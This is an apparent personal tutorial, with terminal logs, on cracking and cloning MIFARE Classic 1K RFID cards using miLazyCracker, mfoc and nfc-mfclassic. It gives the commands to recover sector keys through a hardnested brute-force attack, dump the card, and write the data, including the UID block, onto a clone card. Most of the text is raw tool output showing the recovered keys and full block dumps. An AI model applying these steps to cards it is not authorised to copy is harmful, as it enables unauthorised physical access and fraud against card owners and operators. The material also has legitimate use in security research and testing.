miLazyCracker – Hack Mifare 1K Classic (mfcuk, mfoc)

Link to Part1

1.

miLazyCracker

Found key: 81cc25ebbb6a

Found key: 3e65e4fb65b3

Geräte LED geht auf rot -> direkt neu einstecken (No NFC device found.)

Sonst bricht das Programm ab

2.

Mfoc download: https://github.com/nfc-tools/mfoc/releases

Take a dump of the card if you know key a and b from step 1

mfoc -O carddump.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

 

With default keys (not changed, fresh card): mfoc -O carddump.dmp

 

3.

You need the dump of the original card (step 1) and the dump of the card you want to put on the values of the original card (cloned card)

nfc-mfclassic w a DUMPORIGINALCARD DUMPCLONECARD

Both dumps done with step 2

 

Mathiass-MBP:dump mathias$ nfc-mfclassic w a u original.dmp clone.dmp
NFC reader: ACS ACR122U / ACR122U214 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

 

4. check if the cards are the same

First original, second clone

Found out that the uid is different

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08

 

Check the contents:

mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

Mathiass-MBP:dump mathias$ hexdump -vC clone.dmp > clone.hex
Mathiass-MBP:dump mathias$ hexdump -vC original.dmp > original.hex
Mathiass-MBP:dump mathias$ diff clone.hex original.hex

Mathiass-MBP:dump mathias$ diff original.hex test.hex
1c1
< 00000000 04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 |.....Y..D.. ....|
---
> 00000000 7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d |{x2<.....o.mEh..|

 

Now you can see that just the first block with the uid of the card is different.

 

5.

Change also block zero 0

nfc-mfclassic W a original.dmp clone.dmp

 

Mathiass-MBP:check mathias$ mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys…
Symbols: ‚.‘ no key found, ‚/‘ A key found, ‚\‘ B key found, ‚x‘ both keys found
[Key: 3e65e4fb65b3] -> [….///////////.]
[Key: 81cc25ebbb6a] -> [….xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 – Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d
Mathiass-MBP:check mathias$ mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys…
Symbols: ‚.‘ no key found, ‚/‘ A key found, ‚\‘ B key found, ‚x‘ both keys found
[Key: 3e65e4fb65b3] -> [….///////////.]
[Key: 81cc25ebbb6a] -> [….xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 – Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Mathiass-MBP:check mathias$

 

Mathiass-MBP:mifare mathias$ miLazyCracker
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: ffffffffffff] -> [xxxx...........x]
 [Key: a0a1a2a3a4a5] -> [xxxx...........x]
 [Key: d3f7d3f7d3f7] -> [xxxx...........x]
 [Key: 000000000000] -> [xxxx...........x]
 [Key: b0b1b2b3b4b5] -> [xxxx...........x]
 [Key: 4d3a99c351dd] -> [xxxx...........x]
 [Key: 1a982c7e459a] -> [xxxx...........x]
 [Key: aabbccddeeff] -> [xxxx...........x]
 [Key: 714c5c886e97] -> [xxxx...........x]
 [Key: 587ee5f9350f] -> [xxxx...........x]
 [Key: a0478cc39091] -> [xxxx...........x]
 [Key: 533cb6c723f6] -> [xxxx...........x]
 [Key: 8fd0a4f256e9] -> [xxxx...........x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Unknown Key B
 Sector 05 - Unknown Key A Unknown Key B
 Sector 06 - Unknown Key A Unknown Key B
 Sector 07 - Unknown Key A Unknown Key B
 Sector 08 - Unknown Key A Unknown Key B
 Sector 09 - Unknown Key A Unknown Key B
 Sector 10 - Unknown Key A Unknown Key B
 Sector 11 - Unknown Key A Unknown Key B
 Sector 12 - Unknown Key A Unknown Key B
 Sector 13 - Unknown Key A Unknown Key B
 Sector 14 - Unknown Key A Unknown Key B
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1909 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase

Collected 1919 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
 Starting 8 threads to test 1186294334976 states using 256-way bitslicing
 Cracking... 47.72%
 Found key: 81cc25ebbb6a
 Tested 566767883890 states
 81cc25ebbb6a
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
 [Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
 [Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
 [Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
 [Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
 [Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
 [Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
 [Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
 [Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
 [Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
 [Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
 [Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
 [Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1584 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
 Starting 8 threads to test 1922805806080 states using 256-way bitslicing
 Cracking... 78.92%
 Found key: 3e65e4fb65b3
 Tested 1517855538104 states
 81cc25ebbb6a
 3e65e4fb65b3
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 The custom key 0x3e65e4fb65b3 has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
